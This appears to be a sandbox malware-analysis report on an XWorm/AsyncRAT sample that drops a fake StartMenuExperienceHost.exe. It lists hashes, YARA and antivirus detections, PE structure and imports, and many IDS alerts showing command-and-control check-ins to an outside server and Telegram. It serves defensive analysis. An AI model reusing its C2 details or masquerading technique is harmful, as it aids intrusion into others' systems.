                                                                                                                Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. S.a.t. .. N.o.v. .. 2.3. .. 2.0.2.4. .1.6.:.3.9.:.3.0.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .W.S.C. .S.t.a.t.e. .I.n.f.o. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.

                                                                                                                C:\Windows\StartMenuExperienceHost.exe

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\curl.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):79872
                                                                                                                Entropy (8bit):5.969526908188351
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:K2Kq6qxHg+vmlFB+dbPHq0FzvoqH7fgHOkVzQOCpG:LKIxHAFcdbPJHsHOvhG
                                                                                                                MD5:9D9D23A73F3B3F53E8581D8BB31953C4
                                                                                                                SHA1:EADD04F6DEF413C3987529AC88E5E69C89563852
                                                                                                                SHA-256:4C17F40A56758579CDC2356A9276F92CFA3ED2E56DBB89816E5EAA15CFF0E6F3
                                                                                                                SHA-512:FCAE7AE9D0EAB656CC37469A3AAB9B5A6C14FDE68EB3DD576F8BA8C7DC24FCAF7C8140C5D565E843FBD9A482F29D37A3093B7C95717924A4AA11F3B0704B7622
                                                                                                                Malicious:true
                                                                                                                Yara Hits:
                                                                                                                • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Windows\StartMenuExperienceHost.exe, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Windows\StartMenuExperienceHost.exe, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Windows\StartMenuExperienceHost.exe, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Windows\StartMenuExperienceHost.exe, Author: Joe Security
                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Windows\StartMenuExperienceHost.exe, Author: ditekSHen
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...!.@g............................^M... ...`....@.. ....................................@..................................M..K....`............................................................................... ............... ..H............text...d-... ...................... ..`.rsrc........`.......0..............@..@.reloc...............6..............@..B................@M......H.......,h..........&.....................................................(....*.r...p*. W.R.*..(....*.r!..p*. ...*.s.........s.........s.........s.........*.rA..p*. ....*.ra..p*. /...*.r...p*. .O..*.r...p*. ..J.*.r...p*. ..'.*..((...*.r...p*. S...*.r...p*. ....*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(^...*"(....+.*"(....+.*&(7...&+.*.+5sl... .... .'..om...(,...~....-.(b...(T...~....on...&.-.*.r0..p*. ....*.rP..p*. ....*.rp..p*. 5...*.r...p*.rG..p*. ..e.*.r...p*. .(T.*.r

                                                                                                                Static File Info

                                                                                                                General

                                                                                                                File type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                Entropy (8bit):6.252474904412125
                                                                                                                TrID:
                                                                                                                • Win64 Executable Console (202006/5) 92.65%
                                                                                                                • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                • DOS Executable Generic (2002/1) 0.92%
                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                File name:18sFhgSyVK.exe
                                                                                                                File size:89'088 bytes
                                                                                                                MD5:4e0d7812adef8e43e4eae77bf07dcc94
                                                                                                                SHA1:2499fdf4c66070ec1b4d7c4e499f6dbc56565767
                                                                                                                SHA256:22bbc82f84857c93f15ceb787da8ab57bd25aed0b32ef16124644231b1d142fc
                                                                                                                SHA512:2cc49fce8a77a41bfee1e3ff3c20db247ac3620bfdbfb0334e963450990ff6620b836a497db67aa3062b56c1de94983c5501a795074177afa486f798fea16156
                                                                                                                SSDEEP:1536:EOpH997KeO04edzED4cwhhJQAfxmr5CpPjvuCq21:Emd/r4edAfMQ8x+MPaH21
                                                                                                                TLSH:6193B52DB8BB0B69C9608D7D823942C2F316D54E1FB85E7BB6E904692D15EDC2F64C03
                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......P+...J...J...J...2C..J.......J.......J.......J.......J.._2...J...J..~J.......J..../..J.......J..Rich.J..................PE..d..

                                                                                                                File Icon

                                                                                                                Icon Hash:00928e8e8686b000

                                                                                                                Static PE Info

                                                                                                                General

                                                                                                                Entrypoint:0x1400107a0
                                                                                                                Entrypoint Section:.text
                                                                                                                Digitally signed:false
                                                                                                                Imagebase:0x140000000
                                                                                                                Subsystem:windows cui
                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                Time Stamp:0x6740E5F1 [Fri Nov 22 20:13:37 2024 UTC]
                                                                                                                TLS Callbacks:
                                                                                                                CLR (.Net) Version:
                                                                                                                OS Version Major:6
                                                                                                                OS Version Minor:0
                                                                                                                File Version Major:6
                                                                                                                File Version Minor:0
                                                                                                                Subsystem Version Major:6
                                                                                                                Subsystem Version Minor:0
                                                                                                                Import Hash:9ba39f7e41cae1fe4a814e3cac8ef123

                                                                                                                Entrypoint Preview

                                                                                                                Instruction
                                                                                                                dec eax
                                                                                                                sub esp, 28h
                                                                                                                call 00007F5B8CC4D224h
                                                                                                                dec eax
                                                                                                                add esp, 28h
                                                                                                                jmp 00007F5B8CC4C9C7h
                                                                                                                int3
                                                                                                                int3
                                                                                                                inc eax
                                                                                                                push ebx
                                                                                                                dec eax
                                                                                                                sub esp, 20h
                                                                                                                dec eax
                                                                                                                mov ebx, ecx
                                                                                                                xor ecx, ecx
                                                                                                                call dword ptr [0000289Bh]
                                                                                                                dec eax
                                                                                                                mov ecx, ebx
                                                                                                                call dword ptr [0000288Ah]
                                                                                                                call dword ptr [00002894h]
                                                                                                                dec eax
                                                                                                                mov ecx, eax
                                                                                                                mov edx, C0000409h
                                                                                                                dec eax
                                                                                                                add esp, 20h
                                                                                                                pop ebx
                                                                                                                dec eax
                                                                                                                jmp dword ptr [00002888h]
                                                                                                                dec eax
                                                                                                                mov dword ptr [esp+08h], ecx
                                                                                                                dec eax
                                                                                                                sub esp, 38h
                                                                                                                mov ecx, 00000017h
                                                                                                                call dword ptr [0000287Ch]
                                                                                                                test eax, eax
                                                                                                                je 00007F5B8CC4CB59h
                                                                                                                mov ecx, 00000002h
                                                                                                                int 29h
                                                                                                                dec eax
                                                                                                                lea ecx, dword ptr [00006A42h]
                                                                                                                call 00007F5B8CC4CBFEh
                                                                                                                dec eax
                                                                                                                mov eax, dword ptr [esp+38h]
                                                                                                                dec eax
                                                                                                                mov dword ptr [00006B29h], eax
                                                                                                                dec eax
                                                                                                                lea eax, dword ptr [esp+38h]
                                                                                                                dec eax
                                                                                                                add eax, 08h
                                                                                                                dec eax
                                                                                                                mov dword ptr [00006AB9h], eax
                                                                                                                dec eax
                                                                                                                mov eax, dword ptr [00006B12h]
                                                                                                                dec eax
                                                                                                                mov dword ptr [00006983h], eax
                                                                                                                dec eax
                                                                                                                mov eax, dword ptr [esp+40h]
                                                                                                                dec eax
                                                                                                                mov dword ptr [00006A87h], eax
                                                                                                                mov dword ptr [0000695Dh], C0000409h
                                                                                                                mov dword ptr [00006957h], 00000001h
                                                                                                                mov dword ptr [00006961h], 00000001h

                                                                                                                Rich Headers

                                                                                                                Programming Language:
                                                                                                                • [IMP] VS2008 SP1 build 30729

                                                                                                                Data Directories

                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x159740xf0.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x190000x1e8.rsrc
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x180000x7bc.pdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1a0000x64.reloc
                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x144b00x70.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x143700x140.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x130000x308.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                Sections

                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                .text0x10000x110970x11200982e9bd125639b7a565610da114058deFalse0.30082401916058393data6.218094948449805IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                .rdata0x130000x36c20x38003a813dbc393fccab82a240949403dacdFalse0.4609375data5.464046020236877IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                .data0x170000x7800x200b635e6ee43bdfadc6905884afcfd2da7False0.240234375DOS executable (block device driver)2.115824836017978IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .pdata0x180000x7bc0x800a6396d076eee241b53b734db1ba13355False0.4580078125data4.715636917167317IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                .rsrc0x190000x1e80x200c1bc7cea80222b80fca5f84b4a3c2242False0.541015625data4.7644199514493595IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                .reloc0x1a0000x640x2006634e07bc7ac95cca7424058026329dfFalse0.216796875data1.3014480346693047IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                Resources

                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                RT_MANIFEST0x190600x188XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5892857142857143

                                                                                                                Imports

                                                                                                                DLLImport
                                                                                                                KERNEL32.dllSetConsoleTextAttribute, GetStdHandle, Sleep, CreateThread, Beep, GetConsoleWindow, SetConsoleTitleW, GetCurrentThreadId, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeSListHead
                                                                                                                USER32.dllFindWindowA, SetLayeredWindowAttributes, GetAsyncKeyState, ShowWindow, GetWindowLongW, SetWindowLongW
                                                                                                                MSVCP140.dll??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z, ?good@ios_base@std@@QEBA_NXZ, ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z, ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ, _Query_perf_frequency, ?_Throw_Cpp_error@std@@YAXH@Z, ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ?uncaught_exception@std@@YA_NXZ, ?_Xout_of_range@std@@YAXPEBD@Z, ?_Random_device@std@@YAIXZ, ?_Xlength_error@std@@YAXPEBD@Z, _Cnd_do_broadcast_at_thread_exit, _Query_perf_counter, _Thrd_detach, ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z, ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ, ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z
                                                                                                                VCRUNTIME140_1.dll__CxxFrameHandler4
                                                                                                                VCRUNTIME140.dllmemcmp, __std_terminate, __std_exception_copy, __current_exception, __current_exception_context, __C_specific_handler, memcpy, memset, _CxxThrowException, __std_exception_destroy
                                                                                                                api-ms-win-crt-filesystem-l1-1-0.dllremove
                                                                                                                api-ms-win-crt-runtime-l1-1-0.dll__p___argv, _register_thread_local_exe_atexit_callback, __p___argc, _initterm_e, _initterm, _get_initial_narrow_environment, _c_exit, _set_app_type, _seh_filter_exe, _cexit, _crt_atexit, _register_onexit_function, _initialize_onexit_table, _initialize_narrow_environment, _configure_narrow_argv, exit, _invalid_parameter_noinfo_noreturn, terminate, system, _beginthreadex, _exit
                                                                                                                api-ms-win-crt-heap-l1-1-0.dllfree, _set_new_mode, malloc, _callnewh
                                                                                                                api-ms-win-crt-math-l1-1-0.dll__setusermatherr
                                                                                                                api-ms-win-crt-stdio-l1-1-0.dll_set_fmode, __p__commode
                                                                                                                api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale

                                                                                                                Possible Origin

                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                EnglishUnited States

                                                                                                                Network Behavior

                                                                                                                Suricata IDS Alerts

                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                2024-11-23T21:03:15.686107+01002853685ETPRO MALWARE Win32/XWorm Checkin via Telegram1192.168.2.749704149.154.167.220443TCP
                                                                                                                2024-11-23T21:03:31.312688+01002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.749711104.198.168.1791337TCP
                                                                                                                2024-11-23T21:03:31.666395+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:03:32.015251+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749711104.198.168.1791337TCP
                                                                                                                2024-11-23T21:03:35.005493+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:03:35.005493+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:03:44.735562+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:03:44.739529+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749711104.198.168.1791337TCP
                                                                                                                2024-11-23T21:03:57.811744+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:03:57.818615+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749711104.198.168.1791337TCP
                                                                                                                2024-11-23T21:03:58.126970+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749711104.198.168.1791337TCP
                                                                                                                2024-11-23T21:04:05.021284+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:04:05.021284+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:04:10.892727+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:04:10.894733+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749711104.198.168.1791337TCP
                                                                                                                2024-11-23T21:04:23.967438+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:04:23.980400+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749711104.198.168.1791337TCP
                                                                                                                2024-11-23T21:04:31.734513+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:04:31.739407+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749711104.198.168.1791337TCP
                                                                                                                2024-11-23T21:04:32.653666+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:04:32.655876+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749711104.198.168.1791337TCP
                                                                                                                2024-11-23T21:04:35.036903+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:04:35.036903+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:04:36.981287+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:04:36.985967+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749711104.198.168.1791337TCP
                                                                                                                2024-11-23T21:04:48.781948+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:04:48.784656+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749711104.198.168.1791337TCP
                                                                                                                2024-11-23T21:04:49.282930+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:04:49.285345+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749711104.198.168.1791337TCP
                                                                                                                2024-11-23T21:04:52.904777+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:04:52.906436+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749711104.198.168.1791337TCP
                                                                                                                2024-11-23T21:04:54.388194+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:04:54.489032+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749711104.198.168.1791337TCP
                                                                                                                2024-11-23T21:04:54.589383+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:04:54.608635+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749711104.198.168.1791337TCP
                                                                                                                2024-11-23T21:04:54.690403+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:04:54.728415+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749711104.198.168.1791337TCP
                                                                                                                2024-11-23T21:04:54.801517+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:04:54.848808+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749711104.198.168.1791337TCP
                                                                                                                2024-11-23T21:05:00.363403+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:05:00.439092+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749711104.198.168.1791337TCP
                                                                                                                2024-11-23T21:05:00.564582+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:05:00.566683+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749711104.198.168.1791337TCP
                                                                                                                2024-11-23T21:05:00.640704+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:05:00.730220+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749711104.198.168.1791337TCP
                                                                                                                2024-11-23T21:05:00.760385+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:05:00.849831+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749711104.198.168.1791337TCP
                                                                                                                2024-11-23T21:05:03.840384+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:05:03.842107+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749711104.198.168.1791337TCP
                                                                                                                2024-11-23T21:05:05.053094+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:05:05.053094+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:05:07.107572+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:05:07.111881+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749711104.198.168.1791337TCP
                                                                                                                2024-11-23T21:05:07.308687+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:05:07.310411+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749711104.198.168.1791337TCP
                                                                                                                2024-11-23T21:05:09.514457+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:05:09.516554+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749711104.198.168.1791337TCP
                                                                                                                2024-11-23T21:05:12.481178+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:05:12.594933+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749711104.198.168.1791337TCP
                                                                                                                2024-11-23T21:05:12.682711+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:05:12.720220+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749711104.198.168.1791337TCP
                                                                                                                2024-11-23T21:05:12.939275+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:05:12.941567+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749711104.198.168.1791337TCP
                                                                                                                2024-11-23T21:05:14.950023+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:05:14.951464+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749711104.198.168.1791337TCP
                                                                                                                2024-11-23T21:05:26.887003+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:05:26.894889+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749711104.198.168.1791337TCP
                                                                                                                2024-11-23T21:05:31.287399+01002853193ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.749711104.198.168.1791337TCP
                                                                                                                2024-11-23T21:05:31.641024+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:05:31.653759+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749711104.198.168.1791337TCP
                                                                                                                2024-11-23T21:05:35.069157+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:05:35.069157+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:05:38.640134+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:05:38.716530+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749711104.198.168.1791337TCP
                                                                                                                2024-11-23T21:05:38.949523+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:05:39.017669+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749711104.198.168.1791337TCP
                                                                                                                2024-11-23T21:05:39.250891+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:05:39.265257+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749711104.198.168.1791337TCP
                                                                                                                2024-11-23T21:05:39.497896+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:05:39.502159+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749711104.198.168.1791337TCP
                                                                                                                2024-11-23T21:05:39.978714+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.749711TCP
